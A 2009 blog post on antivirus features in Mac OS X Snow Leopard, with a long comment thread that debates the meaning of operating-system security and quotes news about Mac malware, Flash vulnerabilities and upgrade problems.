Built-in antivirus for OS X


in Geek stuff, Internet matters, Security

Rumours are circulating that Apple’s Snow Leopard OS will include antivirus capabilities. This is a welcome development. While OS X rightly has a good reputation for security, there is no commercial operating system that is immune from malware. In addition to malware that targets OS X itself, there are also exploits based around flash, Adobe PDFs, and even specific pieces of hardware.

Adding antivirus protection might be a bit of a public relations blow to Apple, which has cultivated a false sense that there is no malware that affects Macs. Nevertheless, it is a good security move. Indeed, the server version of OS X has included such capabilities for some time.

{ 55 comments… read them below or add one }

BuddyRich August 27, 2009 at 6:55 am

The keyboard firmware hack was the best. I’ll be sure to tackle anyone walking around with an unplugged apple keyboard heading towards my MBP!

In all honesty, this development is long overdue. Mac’s are no more innately secure than Windows, they just have a lower profile, and hence get lessor attention from the hackers.

I am looking forward to Snow Leopard’s release this Friday, and for only $29 to upgrade its practically a steal.

Milan August 27, 2009 at 8:20 am

While $30 won’t break the bank, Snow Leopard doesn’t seem to have many new consumer-focused features: just behind the scenes changes and some general tweaks.

Certainly nothing as essential as Time Machine, which is one of the best things added to any OS ever, when it comes to the average user. Suddenly, it was possible for the computer-illiterate to have good regular backups.

. August 27, 2009 at 8:22 am

Snow Leopard: The Reviews Are In
Posted by Steven Leckart

Is Apple’s upgraded OS totally awesome, yawn-worthy, or a bit of both?

Find out what reviewers at the NYT, WSJ, Gizmodo, Wired and others think, over at BBG.

. August 27, 2009 at 8:34 am

11 Major New Snow Leopard Features

Macworld staff, Macworld.com

Wednesday, August 26, 2009 6:40 PM PDT

. August 27, 2009 at 11:03 am

Snow Leopard review
by Joshua Topolsky posted Aug 26th 2009 at 9:01PM

Snow Leopard. Even the name seems to underpromise — it’s the first “big cat” OS X codename to reference the previous version of the OS, and the list of big-ticket new features is seemingly pretty short for a version-number jump. Maybe that’s why Apple’s priced the 10.6 upgrade disc at just $29 — appearances and expectations matter, and there’s simply not enough glitz on this kitty to warrant the usual $129.

But underneath the customary OS X fit and finish there’s a lot of new plumbing at work here. The entire OS is now 64-bit, meaning apps can address massive amounts of RAM and other tasks go much faster. The Finder has been entirely re-written in Cocoa, which Mac fans have been clamoring for since 10.0. There’s a new version of QuickTime, which affects media playback on almost every level of the system. And on top of all that, there’s now Exchange support in Mail, iCal, and Address Book, making OS X finally play nice with corporate networks out of the box.

So you won’t notice much new when you first restart into 10.6 — apart from some minor visual tweaks here and there there’s just not that much that stands out. But in a way that means the pressure’s on even more: Apple took the unusual and somewhat daring step of slowing feature creep in a major OS to focus on speed, reliability, and stability, and if Snow Leopard doesn’t deliver on those fronts, it’s not worth $30… it’s not worth anything. So did Apple pull it off? Read on to find out!

Tristan August 27, 2009 at 11:09 am

I think “innate security” of an OS is silly. All that matters is how actually secure it is. And how actually secure an OS is has to do with, among other things, the quantity of malware written for it.

Milan August 27, 2009 at 11:28 am

Computers basically cannot be innately secure, because they are innately permissive. They have no judgment and do exactly what they are told. As long as people keep finding ways to make machines accept their commands (using tricks like buffer overflows, etc), machines will be happy to do whatever they request afterwards.

That being said, it is a lot harder to execute arbitrary code in a well-designed OS than in a sloppily designed one. For instance, versions of Windows where default accounts are all admins are fundamentally vulnerable to attack.

Tristan August 27, 2009 at 12:02 pm

My point is the theory is dispensible – what matters is how secure the systems are in reality. In practice, how often does computer X get infected with malware, not, “in theory, with an equal number of monkeys working at an equal number of malware development stations, which system would become more infected”.

Milan August 27, 2009 at 1:26 pm

Fair enough, though security through obscurity isn’t a great strategy either. Relying on the fact that nobody is attacking your obscure platform or software is a strategy that can fail catastrophically as soon as someone tries.

R.K. August 27, 2009 at 4:39 pm

Note that the Snow Leopard upgrade breaks some software:

Adobe Photoshop CS2
Fallout II
Google Gears
Parallels 3.0
PGP Desktop
PGP Whole Disk Encryption


Matt August 27, 2009 at 4:44 pm

I’m anticipating the arrival of both operating systems (OS X and Windows 7). I’ve owned a 64bit capable computer since 2005, but these will be my first attempts at a 64 bit operating system.

Regarding Snow Leopard not running previous software, such is life. I suspect the upgrade to 64bit makes it difficult to accommodate previous software. I think a bigger issue is that OS X 10.6 will only run on Intel Macs. Any PPC users are stuck with older versions.

BuddyRich August 27, 2009 at 5:04 pm

Thank you Milan. That was what I meant by prefacing innately to what I was saying.

In reality Windows does have 100 times (if not more!) malware written for it, making it the higher risk is to run. However the two variables that make it so (time and effort of hackers) are outside of the OS’ control and can also change over time making any assertion of relative security specific to the moment in time the statement is made.

In essence though the difference between Windows with Anti Virus and OSX without is like comparing a house with a locked door to one with an unlocked one. Sure in reality the unlocked one is safe because no one is trying to get in, but that doesn’t change the fact that a locked door is innately safer.

R.K. August 27, 2009 at 5:09 pm

Regarding Snow Leopard not running previous software, such is life.

True, but a lot of people are going to need to pirate newer versions of Photoshop, which is a pain. Not least because so many of them are laden with tacked-on malware.

BuddyRich August 27, 2009 at 5:20 pm

I quite liked XPx64 (which is more akin to Win Server 2003 than XP) and still run it, I never went to Vista, but I have the half price Win7 Pro on preorder and have the 32bit RC on an older PC slated to be donated to charity and really like it. Especially since it runs well on an older Northwood 2GHz P4 with only 512MB of DDR RAM. Granted the wipe and fresh OS install helped it still feels fairly fast compared to Vista on the same box.

Regarding the apps not compatible, my biggest concern is minor bugs with Photoshop CS3, which was not on that list RK mentioned. Though I don’t know what those bugs are I got my info from this site:


Matt August 27, 2009 at 5:37 pm

True, but a lot of people are going to need to pirate newer versions of Photoshop, which is a pain. Not least because so many of them are laden with tacked-on malware.

That’s probably the best way to get one’s not-so-desirable code to execute on OS X: put it into an installer for pirated software. That way the person enters their password (or in my case and others, leaves it blank because that IS their password) and the code can run.

Emily August 27, 2009 at 6:37 pm


Thanks for the heads up. I’m doing some tech support for Macs right now, so I expect lots of confused people asking questions after the upgrade.

Tristan August 27, 2009 at 8:39 pm

“Sure in reality the unlocked one is safe because no one is trying to get in, but that doesn’t change the fact that a locked door is innately safer”

So, first you empty “innately” of any meaning in reality, and then you re-assert it?

Milan August 27, 2009 at 8:58 pm

My legitimately purchased version of Photoshop is CS1.

Will Snow Leopard break it?

Losing it and TextMate would be savage blows from the snow-dusted cat.

R.K. August 27, 2009 at 9:17 pm

If it breaks CS2, it seems a fair bet it will break CS.

BuddyRich August 27, 2009 at 11:39 pm

I did. I think we are arguing semantics. Perhaps a better word would be intrinsic.

Semantically, how do you define “security”, and more importantly assess it? Does the assessment to determine if something is “secure” or not include only an evaluation of the mechanisms that prevent harm or does the assessment also include the larger context of the number of threats as well?

I think most people don’t think in terms of the larger context when they call something “secure” or not. They would call something “secure” based on the mechanisms alone. I would call the number of threats “risk level” or something like that.

I think the problem is when we try to reconcile the two conditions into one term, security. And then we go and do a relative comparison on top of that! Something can be highly secured yet high at risk, while another can be not secured but low at risk. Because it is high at risk, doesn’t change the fact that its highly secured, just like the fact that something is low at risk, does not change the fact that something is not secure.

Tristan August 28, 2009 at 3:28 am

Call it “innate” or “intrinsic” if you want, what you really mean is outside the real world. Things are only secure or not with reference to real world threat, not ideal ones. So, there is no such thing as “innate” security because outside of the context of actual existent malware, no threats exist at all. No system can be “more innately secure” than any other because “innately” no system is secure at all, or every system is perfectly secure, because “security” has no meaning at all in that context.

Tristan August 28, 2009 at 3:32 am

“They would call something “secure” based on the mechanisms alone.”

Then they are an idiot and should be ignored – because mechanisms are only “secure” insofar as they work with reference to actual threats.

Calling a system “innately secure” is like calling a car “innately safe” without knowing what kind of context it will be operated in. If you don’t know in advance whether the threats are normal road type or demolition derby time or road salt type or driving underwater type, the notion of “safety” can not be applied to the car at all.

And ya, this is semantics. Semantics concerns what words mean. So, if we want to talk to each other, it might be a bit important to discuss “semantics” in cases where it is unclear what the words we are using mean.

BuddyRich August 28, 2009 at 7:13 am

This could get very philosophical but I actually agree with you on this point (I wouldn’t use the strong language you use though):

“Then they are an idiot and should be ignored – because mechanisms are only “secure” insofar as they work with reference to actual threats.”

Yet the common usage of the word is often meant objectively simply meaning how “locked” something is. Its like saying 1024 bit encryption is more secure than 128 bit encryption. I think that is a true and fair statement. It certainly is if no additional context is given. Can you agree to that?

If using your larger context definition it might not be true if half the world is trying to break the 1024 bit encryption and only one person is trying to break the 128 bit encryption.

R.K. August 28, 2009 at 9:34 am

Encryption with more bits can actually be weaker in some cases. For instance, AES-256 has a ‘lousy’ key schedule, whereas AES-128 does not. As a result, AES-256 is vulnerable to attacks that are infeasible against AES-128.

Milan August 28, 2009 at 9:47 am

These semantic arguments are tiring, and personal attacks are never welcome.

The people you are debating may be incorrect, but it is never productive to call them ‘idiots.’

Tristan August 28, 2009 at 12:24 pm

I didn’t engage in a personal attack. If you read what I said. I said people who believe a house is secure because it is locked, without reference to the fact it exists in a world, are idiots. However, I sincerely doubt that these “people” who R. K. seems to think are everywhere, actually exist. When people say locked is more secure than unlocked, they assume a consistent context over both situations in order to compare them – this is not the same as considering the lock without reference to any possible attacks. So, unless someone can prove that people actually deeply confused about security, it isn’t a personal attack.

“Its like saying 1024 bit encryption is more secure than 128 bit encryption. I think that is a true and fair statement. It certainly is if no additional context is given.”

R.K., your mistake here is to infer from the fact that no context is given, to the unjustified and unargued assertion that no context is implied. What is implied in the “more secure” here is that the context is the same for both levels of encryption. 1024 bit is more secure than 128 given the same degree and intensity of attack. This is a useful and justifiable assumption when comparing PCs with PCs – Macs are secure because the cannot be compared with PCs with respect to intensity or numbers of attacks. I’m not the only one who understands this – a large part of Mac’s marketing strategy is hinged on just this fact about security.

Tristan August 28, 2009 at 12:26 pm

Sorry, I should have referred to BuddyRich not R.K. in the last post.

. August 28, 2009 at 4:51 pm

Conventional wisdom is that everything ran great at Apple during the six-month period when CEO Steve Jobs was out having his super-secret liver transplant. Supposedly, the company just kept running without a hiccup. But after unimpressive reports on the performance of Snow Leopard, the new version of the Mac OS X operating system, I’m starting to have my doubts.

R.K. August 28, 2009 at 6:34 pm

For something to be ‘secure,’ it needs to be able to avoid harm from agents that maliciously attack it as well as recover quickly when such attacks succeed. It may also be important to adapt to past attacks, identify attackers, and sometimes initiate active counterattacks.

The key difference between ‘safety’ and ‘security’ is that safety is resilience in the face of non-actor risks, such as weather. Security, by contrast, is all about things that intentionally attack you.

It is possible to be very secure against some threats, while very vulnerable to others. For instance, an airplane might be well protected against antiaircraft guns and missiles, but not protected from being hijacked by someone aboard.

Things aren’t really ‘secure’ or ‘insecure.’ They are just secure or insecure relative to situations: either the one they are in, or one they might find themselves in. For instance, a lightly armoured car might be quite adequate for Paris, but not for Baghdad.

It does seem fair to say that one operating system is inherently more secure than another, relative to a particular threat or attacker. Features like limiting what low-level users can do, and implementing permissions for files and folders, give UNIX systems some claim to being inherently more secure than Windows systems.

Milan August 28, 2009 at 6:54 pm

Security is immunity from the will of others.

Matt August 29, 2009 at 1:38 pm

Features like limiting what low-level users can do, and implementing permissions for files and folders, give UNIX systems some claim to being inherently more secure than Windows systems.

Windows has had permissions since Windows NT. Windows XP includes permissions, as well as different privileges for different user accounts. You should see how locked down the IT department at my work has its XP machines. Without admin rights, they won’t let you do much.

Tristan August 29, 2009 at 4:06 pm

I like Milan’s definition.

R.K. August 29, 2009 at 7:39 pm

immunity from the will of others

Concise and correct.

L’enfer c’est les autres. Of course, heaven is also others.

Tristan August 30, 2009 at 2:43 am

“It does seem fair to say that one operating system is inherently more secure than another, relative to a particular threat or attacker.”

Yes. Exactly. And because no particular threat or attacker is constant across different OS’s, it doesn’t make a lot of sense to say one kind of system is inherently more secure than another. In fact, it might be that the notion of “inherently” just doesn’t mean much when applied to situations in the world where the context can’t be idealized as uniform.

. August 30, 2009 at 11:04 am

The Story of a Simple and Dangerous OS X Kernel Bug

“At the beginning of this month the Mac OS X 10.5.8 closed a kernel vulnerability that lasted more than 4 years, covering all the 10.4 and (almost all) 10.5 Mac OS X releases. This article presents some twitter-size programs that trigger the bug. The mechanics are so simple that can be easily explained to anybody possessing some minimal knowledge about how operating systems works. Beside being a good educational example this is also a scary proof that very mature code can still be vulnerable in rather unsophisticated ways.”

. August 30, 2009 at 11:10 am

Adobe Creative Suite and Snow Leopard: what you should know: Adobe has drawn the line in the sand between Intel and PPC for upcoming versions of its Creative Suite, and now it’s doing so again between CS3 and CS4 when it comes to Snow Leopard support. It might not please everyone, but that’s the price some of us pay for staying on the cutting edge.

Milan August 30, 2009 at 12:48 pm

And because no particular threat or attacker is constant across different OS’s, it doesn’t make a lot of sense to say one kind of system is inherently more secure than another.

There are some kinds of attacks that can be targeted against multiple operating systems. For instance, attempts to hijack SSL via man-in-the-middle attacks, or trying to exploit vulnerabilities in cross-platform applications like Flash and Adobe PDF.

There are also tactics that theoretically work with all operating systems, such as the buffer overflows mentioned above.

Virtualization may further increase the range of threats that are cross-platform.

. August 31, 2009 at 12:58 pm

Snow Leopard includes several security enhancements. According to Apple, Snow Leopard supports 64-bit applications, which the company claims are more secure than 32-bit applications because of the way the operating system handles function-passing. Mac OS X 10.6 also includes hardware-based execution control for heap memory, stronger checksums for preventing memory corruption attacks, and antivirus capabilities.

Symantec, a leading maker of security software, says Snow Leopard’s File Quarantine feature only offers basic malware protection. “It is not a full-featured antivirus solution and does not have the ability to remove malware from the system,” the company said in an e-mailed statement. “File Quarantine is also signature-based only. Malware signatures are only as good as the definitions, requiring Apple to provide regular, timely updates.”

Symantec also notes that Mac OS X’s Software Update mechanism is not fully automatic and lacks a user interface to see which signatures have been downloaded.

Symantec also observes that Apple’s security enhancements do not protect against unauthorized access to sensitive files or block the transmission of sensitive information, like Norton Internet Security for the Mac. The company also says that Mac OS X’s firewall is turned off by default and isn’t as configurable as its product.

. September 3, 2009 at 12:05 pm

Snow Leopard ‘downgrades’ Flash to vulnerable version

Apple ships outdated Flash with OS upgrade; users must manually update to stay safe
By Gregg Keizer
September 3, 2009 11:46 AM ET

Apple has shipped an out-of-date and vulnerable version of Adobe Flash Player with Snow Leopard, security companies have warned.

Worse, say experts, is that Snow Leopard silently “downgrades” once-secure editions of Flash Player to the buggy version that ships with the Mac OS X 10.6 operating system upgrade.

On Monday, Intego, an Austin, Texas firm that specializes in Mac security software, noted that Snow Leopard installs Flash Player The current version of Flash Player for the Mac, however, is actually “It seems that Apple is shipping an outdated, even dangerous version of Flash Player,” Intego spokesman Peter James said on a company blog.

Milan September 3, 2009 at 12:27 pm

These flash issues are all the more reason to use Firefox and NoScript.

The latter can be annoying to use, since you need to manually whitelist sites, but it significantly reduces your exposure to new and existing vulnerabilities.

Matt September 3, 2009 at 4:42 pm

The issue of OS X shipping with an older version of something or rather doesn’t really phase me provided the OS updater downloads new versions after an install. In a year, presumably many things on the disc will be out of date and people doing re-installs from the disc they bought in September 2009 will have to update anyway.

The disc that shipped with my 2005 laptop is Windows XP home SP2. Many updates, including a service pack has been released since then. If I ever do a reinstall, I expect to just download the updates from Microsoft’s site.

Milan September 3, 2009 at 4:44 pm

It may be weeks before Apple issues a security update that includes the new version of Flash.

Milan September 3, 2009 at 4:46 pm

A manual patch is available from Adobe.

Apparently, Windows XP SP3 also shipped with a vulnerable version of Flash, which I think further demonstrates the value of taking secondary precautions, like using NoScript.

. September 11, 2009 at 10:13 am

Mac OS X 10.6.1 update now live

Well, that was fast — just over week after Snow Leopard officially shipped, the first update’s on the books. Nothing major in the changelog here, but we’re told Flash has been updated to a newer, more secure version. Let us know how it goes for you, eh?

. September 16, 2009 at 11:29 am

Snow Leopard Missed a Security Opportunity

By kdawson on where-did-you-put-it-what-you-know-where-do-you-think-oh

CWmike writes “Apple missed a golden opportunity to lock down Snow Leopard when it again failed to implement fully a security technology that Microsoft perfected nearly three years ago in Windows Vista, noted Mac researcher Charlie Miller said today. Dubbed ASLR, for address space layout randomization, the technology randomly assigns data to memory to make it tougher for attackers to determine the location of critical operating system functions, and thus makes it harder for them to craft reliable exploits. ‘Apple didn’t change anything,’ said Miller, of Independent Security Evaluators, the co-author of The Mac Hacker’s Handbook, and winner of two consecutive ‘Pwn2own’ hacker contests. ‘It’s the exact same ASLR as in Leopard, which means it’s not very good.'”

. October 5, 2009 at 4:48 pm

How would you change Snow Leopard?

Ah, Snow Leopard. It’s the same cat you’re used to caressing (or beating, as the case may be), but in a much, much colder climate. Or something like that. OS X 10.6 promised Leopard users a “refined” experience, and one that would only cost upgrading users $29. At that price, most Apple fanatics figured that picking it up on launch day was a no-brainer, but as we’ve come to sadly expect from Cupertino’s software labs these days, all wasn’t perfectly well with the big snowy cat. Even now, users are still kvetching about broken functionality and mental pains that are literally indescribable. Even if you’re not in that camp, we’re eager to hear how your Snow Leopard experience has been. Are you satisfied with the upgrade? Will you never, ever install an Apple update again before a million others try it first? Are you already looking forward to 10.7 Windows 7? Tell all in comments below — you never know who could be tuning in.

. October 12, 2009 at 3:05 pm

Snow Leopard guest account bug deletes user data

By AppleInsider Staff
Published: 01:10 PM EST

Reports of a potentially critical Snow Leopard bug that can erase a user’s account data have continued to surface since the operating system’s debut.

Since Mac OS X 10.6 launched in late August, numerous reports online have detailed the issue, which is triggered by logging in and out of a guest account on a Snow Leopard machine. Upon logging back in to their regular account, users will find that it has been wiped of all data.

. October 20, 2009 at 5:33 pm

“I bought Photoshop CS4 (Windows) on eBay (I know, dumb, dumb, dumb, and more dumb). Packaging, product numbers, and dvds looked real, and it worked for exactly 30 days. Adobe says that serial number is invalid. Have read stories on Internet about trojans in MAC Photoshop CS4 software. I’ve run spyware and virus scans and turn up nothing. Is there any way I can be sure that this counterfeit software hasn’t left a rootkit or something else nasty on my computer. Thanks!”

. November 21, 2009 at 6:49 pm

First Malicious iPhone Worm In the Wild

“After the ikee worm that displayed a picture of Rick Astley on jailbroken iPhones, the first malicious iPhone worm (Google translation; original, in Dutch) has now been discovered in the wild. Internet provider XS4ALL in the Netherlands encountered several of such devices (link in Dutch) on the wireless networks of their customers and put out a warning. After obtaining a copy of the malware it was discovered that the jailbroken phones, which are exploited through openSSH with a default password, scan IP ranges of mobile internet providers for other vulnerable iPhones, phone home to a C&C botnet server, are able to update themselves with additional malware and have the ability to dump the SMS database as well. Owners of a jailbroken iPhone with a default root password are advised to flash to the latest Apple firmware in order to ensure no malware is present.”

Milan January 18, 2010 at 6:48 pm

Once again, the importance of implementation is demonstrated: even implementations of quantum cryptography can be broken.

. January 26, 2010 at 9:33 am

Intego’s “Year In Mac Security” Report

“Mac OS X and iPhones that haven’t been jailbroken fare pretty well (although vulnerabilities exist, there’s not been a lot of exploitation). Apple does come in for criticism for ‘time to fix’ known vulnerabilities. Jailbroken iPhones are a mess. The biggest risk to Macs are Trojan horses, often from pirated software.”

Milan May 24, 2010 at 10:25 am

Over the past few months, my iMac became woefully slow and buggy. It was my hope that upgrading to Snow Leopard might unclutter it a bit. Thankfully, it has done exactly that.

Because the Snow Leopard installer wouldn’t recognize my hard drive as a valid installation target, I had to back everything up using Time Machine (and a few DVDs for really critical files) and then do a low-level format on the drive.

So as to still have iPhoto, I then used the system recover feature on the Mac OS boot disc to copy all my data back from the external drive. The Snow Leopard installer was then happy to run.

Everything is working better and more smoothly. Programs load faster, even websites, and the system feels zippy and stable.

. November 2, 2010 at 5:56 pm

SecureMac and Intego, among other security firms, today alerted the Mac community to a new Trojan threat, trojan.osx.boonana.a (Intego gives it the name OSX/Koobface.a), which is spreading via social networking sites like Facebook and e-mail. The trojan appears as a link in messages with the subject “Is this you in this video?”, and when users click on the link, a Java applet downloads an installer, which modifies system files to bypass passwords and other protections….

. May 15, 2011 at 4:53 pm

A new piece of malware is spreading, notable because it targets computers running Mac OS X, rather than Windows. Reports of the trojan “MAC Defender” (aka Mac Protector, aka Mac Security) first surfaced on May 2, but the malware has since morphed and proliferated.

The basics: it spreads as search engine optimization (SEO) poisoning, using popular search terms for prominent search engine results.

. May 25, 2011 at 12:11 am

“That’s new ground for Apple,” Storms said, pointing out that the move is a first for the company, which until now has only offered a bare-bones malware detection mechanism in Mac OS X 10.6, aka Snow Leopard, and then only populated it with a handful of signatures.

“Not only is Apple going to help customers remove [Mac Defender], but by doing so, they’re also admitting that there are security problems with Mac OS,” Storms said.

MacDefender — which also goes by names such as MacProtector and MacSecurity — first popped up earlier this month when French security company Intego said it had found the scareware in the wild.

Leave a Comment

{ 1 trackback }

Previous post:

Next post: